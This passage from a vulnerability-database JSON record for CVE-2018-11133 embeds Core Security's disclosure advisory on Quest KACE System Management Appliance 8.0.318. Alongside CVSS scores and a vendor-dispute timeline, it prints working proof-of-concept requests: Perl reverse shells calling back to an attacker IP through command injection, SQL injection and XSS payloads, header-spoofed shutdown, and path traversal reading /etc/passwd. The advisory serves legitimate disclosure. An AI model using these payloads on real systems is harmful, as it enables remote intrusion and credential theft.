"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-11133",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11133",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-15640",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1221",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-11133",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11133",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15640",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11133",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"id": "VAR-201805-0593",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
}
]
},
"last_update_date": "2023-12-18T12:01:57.613000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementAppliance Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137665"
},
{
"title": "Quest KACE System Management Appliance Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81233"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
